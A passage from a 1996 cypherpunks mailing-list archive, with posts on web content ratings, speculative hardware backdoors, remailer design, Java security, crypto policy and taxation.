* schneier@counterpane.com    discount offer, send me e-mail.
*
* For Blowfish C code, see ftp.ox.ac.uk:/pub/crypto/misc/blowfish.c.gz
**************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 27 Apr 1996 12:56:54 +0800
To: cypherpunks@toad.com
Subject: Re: Guardian angels, anonymity, and the decency brigade
Message-ID: <IlUDaSS00YUvIGtoNf@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Colin, for replying. I'm glad to learn that you made no legal
threats against Jim's CuD. I understand that SafeSurf does not make
sofware; I meant that a PICS/SafeSurf-compliant browser is necessary
to read and act on such ratings.

A few months ago, I went through the back archives of the
fight-censorship list and looked for possibly "indecent" material. I
found relatively few examples of this language, and all of them had
clearly socially redeeming value, like the American Reporter's rather
heated essay. The alt.sex.pedophilia story I cited was circulated
among the anti-porn groups who fought for the CDA; in context, it was
perfectly appropriate for us to discuss here. Further, I believe quite
strongly that minors should be allowed and encouraged to participate
in discussions on this list -- overbroad net-censorship affects them
as well as adults.

Yet you write: "Clearly a site with a message like this would not be
suitable for children to read."

What if I rate <http://fight-censorship.dementia.org/top/> as suitable
for children, and a CyberAngel volunteer visits and stumbles onto that
alt.sex.pedophilia story. Will my rating be yanked? This is what
bothers me -- the undocumented, arbitrary, and capricious nature of
ratings by the CyberAngels volunteer decency brigade.

I support your right to censor my web site, but I don't have to like it.

-Declan (who still wants to be a CyberSeraphim)

----------------------------------------------------------------------
                       [Another reply attached]
----------------------------------------------------------------------

Date: Fri, 26 Apr 1996 11:20:12 -0400
From: Tom Betz <tbetz@pobox.com>
Subject: Re: Guardian angels, the decency brigade, and cyberseraphim


Colin Gabriel Hatcher wrote:
> As for press, we didnt even send a press release until 4 months after we
> started, and then only to announce our website.  And we've only sent one
> more press release out since then.  We do believe however that we have
> helped to bring the issue of children and the Internet to the forefront and
> that is a good thing too.

This claim is totally disingenuous.  They have the biggest PR whore on
the face of the Earth flacking their efforts almost daily on NYC talk
radio, and they dare to pretend to have only sent out one press
release?

What kind of training do these people receive?  I heard an NPR story
on this organization where every telecommunications term of art a
CyberAngel used was used incorrectly, always with a sick
misinterpretation.  I'll dig up citations if anyone is interested.

Despite what they 'believe', CyberAngels have helped to do nothing but
inflame the passions of the ignoranti against the Internet, and to
make a nearly non-existent threat into a major political football.
Oh, and to give Curtis Sliwa one more dead horse to flog on the air.

The whole thing disgusts me.

-- 

---- Tom Betz --------- <http://www.pobox.com/~tbetz> ------ (914) 375-1510 --
  tbetz@pobox.com | We have tried ignorance for a very long | tbetz@panix.com
------------------+ time, and it's time we tried education. +-----------------
-- Computers help us to solve problems we never had before they came along. --






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Apr 1996 12:30:16 +0800
To: sameer@c2.org
Subject: Fair Taxiation, credentials, guvmint interference
In-Reply-To: <199604260933.CAA28293@clotho.c2.org>
Message-ID: <Pine.SUN.3.93.960426123310.6710A-100000@elaine47.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996 sameer@c2.org wrote:

> > one at all, to a system of fair taxiation, since much of the talk could
> 
>         fair taxation. What a concept. Now why did this person appear
> in my "cypherpunks-people-to-read-file?" I should go figure this out
> and fix it.

That's not what he wrote. He meant fair TAXIation. Michael is criticizing
arbitrary government regulations on transportation systems. See part four
of Hernando de Soto's _The Other Path_ and other publications from
Instituto Libertad y Democracia (Lima, Peru). The original Spanish version
is more complete, with a statistical appendix, but the US paperback
edition, ISBN 0-06-091640-0, hits all the main points.

The issue of taxis that lack government license has also been raised in
New York City and San Franciso in recent years. Might also be in Gabriel
Zaid's La Economia presidencial, but it's been a while since I read that,
and I don't own a copy.

Cypherpunk relevance? In theory at least, the "medallions" that identify
legal taxis are a form of Chaum's credentials without identity.

Loomis is in your "cypherpunks-people-to-read-file" because of the
ZundeLooMirror. He's a good guy, if a bit abrasive. Unfortunately, I found
out too late that the best way to get him to do something stupid and
wrong is to tell him that it's stupid and wrong. That makes you an enemy,
and not worth listening to.
http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html

By the way, I think I know what you mean, but someone unfamiliar with
cypherpunks or you might read this indication that you have a "people to
read" file, and don't care to read people you disagree with, the wrong
way. You're liable to be called a FUCKING CLOSED-MINDED CENSOR NAZI.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Apr 1996 12:34:17 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <ada66cd5000210045f20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


My 9th grade classmate Rick Smith wrote:

>Having penned the response to Jeffrey Flinn on the unlikelihood of
>processor back doors, I'll comment on jim bell's response:

>> More likely,I think, an organization like the NSA
>>might build a pin-compatible version of an existing, commonly-used product
>>like a keyboard encoder chip that is designed to transmit (by RFI signals)
>>the contents of what is typed at the keyboard.  It's simple, it's hard to
>>detect, and it gets what they want.
>
>Simple, no. Hard to detect, somewhat. Gets what they want, unclear.

I haven't been commenting on this part of the thread, but since I am asked
to (below), I'll say that I agree with Rick on these points.

Though there have been fictional accounts--e.g. the French novel
"Softwar"--about replacement of chips with TLA versions, this tack is very
hard to pull off. (The Infoworld "April Fool's Day" 1991 report that the
NSA had arranged for printers entering Iraq to be modified so as to send
intelligence info was gullibly picked up by several outfits that should've
known better and reported as fact.)

>My experience with processor design and development is rather ancient
>and my knowledge of IC work is third hand, so I'll gladly defer to
>someone with closer knowledge of the process (Tim?).  However, I've
>never heard anything to imply that a processor architecture can be
>cleverly and reliably dinked with in this manner without lots of
>expensive engineering. Where does the chip real estate come from?  Is
>there room in the microcode for this? Will it destabilize other
>behaviors? Will the victim detect it through RFI testing?

For high-volume parts, such as the chips in the usual PCs we all use, such
a replacement would almost certainly need the cooperation of the chip
makers. Not impossible to obtain, but not easy. A new "stepping" of the
chip would probably be needed, though I suppose a chip with downloadable
microcode could be used.

Much more like, in my opinion, would be subversion of the software, a la
Thompson's point about subverting compilers.

And the work already done on "subliminal channels" that leak information
(deliberately in this case) is apropos. I know that such channels were a
major concern during the discussions of nuclear arms treaties.
Speculatively, if such a hardware replacement is likely, this is where I
would look first; but of course the parties to nuclear arms agreements know
this as well.

Anyway, there are all sorts of "maybes" and "possibles" here. Certainly
there is no _technical_ reason why a "Pentium--NSA-enabled" variant of the
Pentium could not be made...all things are possible. But how likely? And
where in the spectrum of real concerns does it lie? And would Intel dare to
cooperate with such a plan? And so on.

This'll have to be my last word on this topic.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Wern <bwern@jaxnet.com>
Date: Sat, 27 Apr 1996 09:47:07 +0800
To: cypherpunks@toad.com
Subject: Private Idaho and MS Exchange
Message-ID: <Pine.3.89.9604261241.A21602-0100000@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone has any experience with / tried to use Private Idaho with MS 
Exchange? I select the settings for Exchange, but it doesn't seem to 
transfer the message over properly.

Ben Wern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Sat, 27 Apr 1996 13:19:21 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: trusting the processor chip
Message-ID: <v01540b04ada6ca77a483@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 AM 4/26/96, jim bell wrote:

> By NSA standards, it is simple.  NSA has probably had its own
> semiconductor  fabs for 30+ years.

Yep. Regardless of whether the fabs are government property or not,
it's a sure thing that some contractors have appropriately SCIFfed
fabs and appropriately cleared staffs.

> Even if we assume that
> their capabilities lag  commercial production in terms of
> density or quality, keyboard encoder chips  were trivial 20+
> years ago and could presumably be easily
> duplicated/modified today by even the oldest operating fabs.
> They probably  had far less than 10,000 transistors.  Even
> modern keyboard controllers  probably "waste"  a
> microcontroller with far more capability than you'd need
> for the task, and microcontrollers usually have
> substantially more code area  than would be necessary to add
> some sort of surreptitious function.

Agree. Keyboard controllers (and other peripheral components
of a system) are a much more tractable target than the CPU and
may be within the capbailities of such organizations. I'm more
inclined towards disk controller subversion myself. Of course,
there's also the apocryphal story of the so called "Iraqi
printer virus" that disabled the Iraqi air defense system.

Subverting the CPU is not simple even by NSA standards.

Rick.
smith@sctc.com        secure computing corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sat, 27 Apr 1996 11:57:31 +0800
To: cypherpunks@toad.com
Subject: Click here to become an International Arms Trafficker
Message-ID: <Pine.LNX.3.91.960426140208.31791A-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



   "Click here to become an International Arms Trafficker"

Offshore Information Services Ltd. has set up a web page to make it really
easy for people to become International Arms Traffickers.  All they have to
do is fill in their name and email address and then click.  Check out:

   http://online.offshore.com.ai/arms-trafficker/

If you think this is half as funny as I do, please make a link from
one of your pages to this one.

  -- Vince






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "G Ackerman" <gerhard@[192.96.77.1]>
Date: Sat, 27 Apr 1996 05:11:56 +0800
To: cypherpunks@toad.com
Subject: PGP + Pegasus Mail
Message-ID: <m0uCmvi-0006wbC@pyrod.ovsod.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I want to know if it is possible -  and how to use PGP from within 
Pmail.  (I want to use the Encrypt option in PMail with a method PGP 
- is it possible and what must I do to get it to work) (including Digital 
Signature, etc)

Thanks
  |\/\/\/|
  |      |
  |      |       
  |  (o)(o)     G Ackerman
  C       _)    Free State Education Department 
  | ,____|      gerhard@pyrod.ovsod.co.za
  | /           +27 +(0)51 4074127
 /__\
/   \

DISCLAIMER:  EXPRESSED OPINIONS ARE MY OWN AND MIGHT NOT BE
             SHARED BY MY EMPLOYER OR ANYONE ELSE.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 27 Apr 1996 13:04:46 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <ada5c3312c021004e096@[205.199.118.202]>
Message-ID: <199604262004.PAA00293@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> The first "killer applet" (tm) will be what?
> 
> (There's a fair chance it could be a digital commerce applet, something to
> exploit correctly the pent-up demand for online purchases....I can imagine
> folks on this very list becoming the Scott Cook's of this market....)

I'll bet the first one will be a mailer that communicates with a central
mail server.  There's a need for people who don't know how to telnet to
have handy access to their mail from both home and work. 

Some of the work that's being done with pgp compatible java applets is
very exciting -- I expect that the general public will get its first taste
of secure email from java applets doled up by ssl servers.

It would be really great if a gui and and some crypto guts could be 
reused for both a java pop client and an applet that could talk to a 
central mail server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sat, 27 Apr 1996 14:34:27 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster message formats
Message-ID: <ada6f5a301021004defb@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I know Raph already answered this, but I want to toss my few cents in.

It is important to understand the threat model of Mixmaster. I assumed that
all links and some remailers would be compromised. My goal was to ensure
that no information about the message was revealed except to the first and
last remailers in the chain. To borrow from physics (black hole)
terminology, the message must have no hair.

Any active padding by the remailer implies that it knows an upper limit on
the size of the actual message. If each remailer removes some information,
which must be replaced, then conspiring remailers can obtain information
about the where messages are going, by comparing size, and knowing that the
"kernel" of the message can only shrink.

This last statement is true unless remailers add extra hops, which they
encrypt. The reason this is not effective has been thoroughly discussed on
this list.

Take a look at the essay on my home page. It explains most of the design
decisions.

        -Lance Cottrell


At 5:25 PM 4/25/96, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I was thinking about how Mixmaster needs a separate message format so it
>can make messages a fixed size and add a packet ID.  However, couldn't all
>this be done with PGP?  With PGP, the length of the file being encrypted is
>encrypted itself, so it would be possible to append random data to the end
>of the file to make the message a fixed length like Mixmaster.  Also, the
>packet-ID could be implemented by putting a line such as the following in the
>message:
>
>::
>Packet-ID: foobar
>
>The only other thing that would have to be taken care of is chaining.  The
>way I could see this working is to have a header in the encrypted message that
>tells the remailer whether it should de-armor the message at the next layer,
>append random data, then re-armor, and pass it to the next remailer.  Am I
>missing something?
>
>- -- Mark
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
>http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
>"The concept of normalcy is just a conspiracy of the majority" -me
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3
>Charset: noconv
>
>iQCVAwUBMYAXxLZc+sv5siulAQG5CwP/Qbgune3sjNyB7Y8xNxNW6hCahtgBNJDk
>oT+hZHdlmcB6CZXjgDUSczIfAnygS71PBBysB4DJnugluMTMTGfqmgeikXdvL1zt
>vnwx5xlG0HQeTbVE2+c1uW4uamkdb0MZmNLR06S9M+2i0ROaWzGwNO6WEHqoEL3W
>qwXZ7zPtId0=
>=MaO4
>-----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYFHQfPzr81BVjMVAQH0qgf8DbhHB2rHxYAAMBKoOAiDRW7zy+UViknf
2BmIv6NDW2MYtTHNSLykDVx3XQCeGG4QuuFcmdveD3livQizC9Tb5Rj8cMNI/Qb6
R7RYEAsaraluxBYNxHxFPejZUy/r9jjJm+LzSVaYVfEdzgt5jjNrm2YV53nOinD8
4sfgBtWNKWAyiyl7lTFWKAhLdfYsp3klTecnEBuPetZlv1V3b4RR2xZi4ggIK4VR
lFkASSQUp/c+JhkJWRcNw6z+Df2XJ59ORUGC+MuJp/W56YoTGicca3mI64qGwg7J
745XF8oAOuD3OCvreWiOYU/LScG3lKKMYfhCyWnGXpt32BJyM5hm1w==
=WD5g
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 27 Apr 1996 13:44:10 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <2.2.32.19960426061421.00688cec@gateway>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:56 AM 04/26/96 -0700, Alan Olsen <alano@teleport.com> wrote:
>>Does anyone have any idea what "more laser material" means?
>
>It means that the laser burns itself up when fired.  Either they are pumping
>gas into the laser and eventually run out or they are using something that
>is solid or semi-solid (yes, you can make a laser out of Jello!) that
>becomes non-functional after a certain number of uses.
>
>The plans I have for a somewhat high powered laser (10 watts) requires
>nitrogen pumped through the tube.  Run out of nitrogen and you run out of
>laser...
>
>The problem with laser based weapons is they are weather dependant.  Try
>using a laser in the rain and see how coherent a beam you get.

To _some_ extent, that's a function of the laser's frequency. An X-ray
laser, for example..... :-)

Dave "Do not look into laser with remaining eyeball" Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYBbiMVrTvyYOzAZAQEYogQAsmRIer5N2emPQ5t37WzzmMisHNbgduWS
q80aA15xJLkZY62q2IGpvTqUDaY7D2ETfi1rUDs2CC1vYRRmjz5RathGAiLfzfmQ
XWIXi1xHxwNxnsa5oPcm7xpQd8LWnZgsbRvvB4NIoU/1ScMZ+qhXQMaUanuU+kbZ
KlvmTfom81A=
=GYM8
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Apr 1996 14:28:08 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <ada697c601021004c3a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 4/26/96, Bill Frantz wrote:
>Tim May and Mike Duvos have expresses an enthusiasm for Java which I share.
> There are a few practical issues which should be addresses.

And bear in mind that "enthusiasm" does not mean certitude. We've all
gotten enthusiastic at times about some Next Big Thing. I count this
enthusiasm as part of the larger Web picture, which is unlikely to fizzle
out.

>Tim says:
>>One interesting remark I read from someone was that the Java distribution
>>model returns us to an era of easier distribution of small programs. The
>>"application bloat" of very large programs may be at least partly fixed.
>>We'll see.
>
>I have my doubts about this one.  I think application bloat comes from
>market forces and from the kind of bundling you see in XYZCorpOffice
>products where you get 4 applications packaged together.  This marketing
>approach maximizes revenue by selling you products you don't need as a
>matter of convenience.  But, we shall see.

If you mean "Microsoft Office," I wasn't really thinking of this. The point
this person I cited (I don't remember who it was) was that this makes it
easier for a application to get "shelf space," because the shelf is the
Web. Payment is problematic, but distribution should be easy.

Obviously, Mosaic (and then Netscape) was a good example of this. A small
team, or even a single person, with a Good Idea, gets distribution. The Net
and Unix have long had this (with Unix tools and languages), but the Web
and applets may well extend this to a broader base.

We'll see.

>There are some features of Java which make it less than ideal for crypto
>applications.  These features can be overcome, but they will affect
>implementors and users.

I think the interesting target date to plan for is a year from now.

>(1) There are not many sources of high-quality entropy available to Java
>applets.  Keystroke timings and scribble windows are probably the best
>sources, but may represent an inconvenience for users.

Shouldn't be any worse or any better than with the status quo, right? I'm
not sure I see the Java issue. (I've been looking at SoundClip and
AudioClip, but only cursorily.)

By the way, Hal Finney is working on a bignum package.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 27 Apr 1996 14:37:29 +0800
To: cypherpunks@toad.com
Subject: Re: An idea for refining penet-style anonymous servers
In-Reply-To: <Uc5fx8m9LojB085yn@netcom.com>
Message-ID: <4lrkjn$abo@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Uc5fx8m9LojB085yn@netcom.com>,
Alan Bostick <abostick@netcom.com> wrote:
>My scheme is the design of the address database.  It consists of two
>hash tables, one for sending messages (which maps anonymous IDs onto
>sender's addresses), and one for receiving them (mapping recipient's
>addresses onto anonymous IDs).  A cryptographically secure hash (say,
>MD5) is used for the index of both tables.
>
>The index of the sending message table is the MD5 hash of the sender's
>address.  The table entry the index points to is the sender's anonymous
>ID, encrypted by a symmetric algorithm (maybe IDEA).  The encryption key
>would be a different hash, by another algorithm (let's suppose it's
>SHA), of that same address.
>
>In forwarding a message, the server MD5-hashes the sender's address and
>looks at the table.  If it doesn't find a corresponding entry, it
>creates one.  If it *does* find an entry, it SHA-hashes the sender's
>address and uses this key to decrypt the anonymous ID.  In the unlikely
>event of collision the decrypted ID will be gibberish and the server
>does something sensible (like appending padding to the address and
>trying again).  The header information is filtered and the anonymous ID
>inserted in the From: line. 
>
>The receiving message hash table is designed similarly, in reverse.  The
>index of the hash table is the MD5 hash of the anonymous ID; the entry
>in the table is the recipient's email address, encrypted with the SHA
>hash of the anonymous ID.  When a message comes in, the anon ID is
>hashed and looked up in the table.  If  nothing is found, the message is
>bounced. If an entry is found, the anon ID is SHA hashed and the table
>entry decrypted.  If it is gibberish, a collision has taken place and
>handled appropriately.  The message is then forwarded to its intended
>recipient. 
>
>What all this accomplishes is to obscure more information from attackers
>and from honest operators.  In the event of abuse it is a simple matter
>to find out who the abusers are and block them out.  If the operator is
>subject to subpoena, anyone named in the subpoena can be easily
>identified . . . *but nobody else can!*  Authorities cannot use a search
>for one identity as an excuse for a fishing expedition in the address
>database. 
>
>(Obscuring information from honest operators can protect the operator
>when questions of liability or even conspiracy come up.)
>
>There is a way that attackers who have seized or copied the database can
>search it - by trying it out on anonymous IDs, or user addresses, until
>they hit paydirt.  And of course such an anonymous server can be no more
>trustworthy than its operator; and the fundamental security limitations of
>the penet-style anonymous server are well-understood.
>
>So what do people think of this scheme of mine?  Are there drawbacks or
>weaknesses that I'm not seeing?  Is it a good idea?  I'd really like it
>if *something* good came out of being laid up with the flu. 

This sounds a bit like the scheme mentioned in AC2, pp73-74.
Check it out (and its reference, if you have time...).

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 27 Apr 1996 14:44:09 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: The Joy of Java
In-Reply-To: <199604260527.WAA02314@netcom8.netcom.com>
Message-ID: <199604262131.RAA13066@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes:
> > 1. Java is of course not a perfect language, nor even the
> > best for specific applications. Other languages will
> > continue to thrive. Critics of the language and related
> > items (applet model, JDK, JITs, etc.) may point to various
> > problems (e.g. security).
>
> > 2. However, the "big picture" is compelling. Java arrives
> > at a time when a Babel of languages and platforms threatens
> > interoperability. C++ is despised by many (though, to be
> > fair, liked by many, too), and developers are adopting
> > Visual Basic (and the vbx widgets, etc.), PowerBuilder,
> > Delphi, flavors of Smalltalk (no pun intended), and
> > scripting languages (Perl, TCL, Python, etc.).
>
>I completely agree with this.  Java incorporates the type of
>automatic corruption-proof memory management found in languages
>like APL, the basic notions of object oriented programming, fast
>dynamic linking, and a C-like program structure.
>
>This is powerful combination of features and gives Java the
>potential to do all the platform-independent things that were
>advertised for C before the rude reality of thousand line
>makefiles reared its ugly head. . The complete specification of
>the Java Virtual Machine means that the behavior of Java programs
>is perfectly well-defined, and one does not have to tweek
>anything which is processor or operating system dependent.

Unfortunately, this last statement isn't really true.  To quote from the
"Java Security" paper from some Princeton researchers:

    The Java language has neighter a formal semantics nor a formal
    description of its type system.  We do not know what a Java program
    means, in any formal sense, so we cannot reason formally about Java
    and the security properties of the Java libraries written in Java.
    Java lacks a formal description of its type system, yet the security
    of Java relies on the soundness of its type system.

And later:

    The Java bytecode is where the security properties must ultimately
    be verified . . . .  Unfortunately, it is rather difficult to verify
    the bytecode. . . .  The present type verifier cannot be proven
    correct, because there is not a formal description of the type
    system.  Object-oriented type systems are a current research topic;
    it seems unwise for the system's security to rely on such a
    mechanism without a strong theoretical foundation.  It is not
    certain that an informally specified system as large and complicated
    as Java bytecode is consistent.

And in the conclusions:

    We conclude that the Java system in its current form cannot easily
    be made secure.  Significant redesign of the language, the bytecode
    format, and the runtime system appear to be necessary steps toward
    building a higher-assurance system. . . . Execution of remotely-
    loaded code is a relatively new phenomenon, and more work is
    required to make it safe.

I do think that the ideas embodied in Java are very important, and will
significantly shape the future of computing, but Java itself may be just
a stepping stone on the way.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 27 Apr 1996 13:39:09 +0800
To: smith@sctc.com (Rick Smith)
Subject: Re: trusting the processor chip
In-Reply-To: <199604261557.KAA20525@shade.sctc.com>
Message-ID: <199604262137.QAA09079@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ross Anderson's "Programing Satans Computer" springs to mind.
www.cl.cam.ac.uk/users/rja14/ 

Ross' papers are up there on my list of very worthwhile reading.

Adam


Rick Smith wrote:
| 
| 
| cwe@it.kth.se (Christian Wettergren) writes:
| 
| >Take a look at the IEEE Symp on Security and Privacy Proceedings from
| >1995, I believe it was. There was a paper there about security bugs in
| >the Intel processors, enumerating a number of them in 80386 for example.
| >There where at least one or two byte sequences that plainly stopped 
| >the processor.
| 
| Yes, and this is where the real risks are. The original question was
| entirely about explicit subversion. The larger risk is accidental
| flaws. Same with software in most cases.
| 
| Rick.
| smith@sctc.com           secure computing corporation
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Apr 1996 15:00:01 +0800
To: cypherpunks@toad.com
Subject: Re: Is the public involved in the crypto policy debate?
Message-ID: <ada69f4d020210048855@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim sent me a private message, which I did not realize was not
also addressed to the list as a whole. I'll remove any of his quoted
comments so I can post my comments here.

(This is an important issue. I think most people who write thoughtful
essays, as Alex did in his private message to me, should post their
thoughts publically. "Saving bandwidth" is hardly a good thing to do when
the issues are so central to why we exist as a group.)

About whether we and people like us have had an influence, or are seen by
Washington, Bonn, Moscow, etc. as a bunch of meddlers and spoiled children:

The "vocal public sector" consists of:

- the attendess at CFP and similar conferences
- many of the readers of "Wired" and similar mags
- nearly all members of the Cypherpunks and similar lists
- a huge fraction of the readers of Usenet
- various "public interest" lobbying groups, including the ACLU, EFF, EPIC, etc.
- many members of the press who write articles critical of crypto policy
- nearly all libertarians (and Libertarians)
- professors and policy analysts who write articles critical of crypto policy
- many leftists who fear government snooping, COINTELPRO, etc.
- many rightists who fear government snooping, anti-militia laws, Waco, etc.

This is a powerful "axis."

Do Americans support our position? Some say yes. I'm not so sure we should
rest easy.

If the issue is rephrased as: "Should nuclear terrorists be free to plot
the destruction of New York City with unbreakable cryptography the FBI is
powerless to do anything about?," the answer will be "Of course not."
(Well, maybe not if New York City is the exemplar....)

This is why I am so skeptical of public opinion polls on crypto. Those who
live by the sword shall die by the sword.

And if this round of crypto regulation is "lost" by the Administration, or
if a major new terrorist incident occurs, or if PGP is involved in a
heinous incident, or if a more statist Administration comes to power, I
fully expect a campaign invoking the Four Horsemen of the Infocalypse. Then
we will likely find that "most Americans" support "reasonable restrictions"
on communications privacy, including limits on crypto strength, mandatory
escrow, major limits on anonymous digital cash, etc.

This is why we must get to the "point of no return," the point of the phase
transition, before "they" do.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Apr 1996 13:48:33 +0800
To: Michael Loomis <ml3e+@andrew.cmu.edu>
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <UlU8SES00iWV80j2lz@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.93.960426164357.6595A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, Michael Loomis wrote:

> Excerpts from internet.cypherpunks: 25-Apr-96 Re: US law - World Law -
> Se.. by Timothy C. May@got.net 

> > Those on the list about a year or so ago may recall that there are
> > proposals to in fact impose a "capital flight tax." This would make the
> > U.S. a country very much like the former Soviet Union, which forbade such
> > transfers of wealth without payment of heavy taxes.
> 
>     I have been reading this list to get an idea where Declan gets some
> of his lunatic ideas and what Rich Graves says when he is not up to
> Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
> that the basic point of this list is some libertarian notion that tax
> evasion is a good thing.

Your observation about the primary point of the list is incorrect in my
view and even if it were correct, you overlook several aspects of the U.S.
taxation system when you class all efforts to reduce or otherwise mitigate
taxation as "tax evasion."

First of all, and as one of the only western powers to do so, the United
States taxes its citizens on _worldwide income_.  While this in itself,
with a proper foreign tax credit system, is not offensive, when the Unites
States adds to this a very wide scope of extraterratorial jurisdiction and
compelled process, it becomes more than tax.  Further, the United States
implements policy it cannot directly legislate constiutionally through
taxation.

Now, all of the above might not be unusual, but when it is combined with
proposals like the expatraition tax (leave the country and pay a tax for
doing so- and by the way, there is a form of this on the books and
applicable today in the US) and strict money laundering regulations you
approach something like currency controls.

It is also worth noting that your notion of tax evasion is by no means
universal.  Switzerland, Liechtenstein, the Cayman Islands, France, the
United Kingdom, all define tax evasion differently.  Who are you, or
anyone else, to say what tax evasion is, especially when it regards income
derrived outside of the geographical and economic boundries of the taxing
state?

The United States has asked for this problem by imposing a regime of
worldwide taxation on income.  I, for one, am not particularly
sympathetic.

> While I am not clear how serious of threat, if
> one at all, to a system of fair taxiation, since much of the talk could
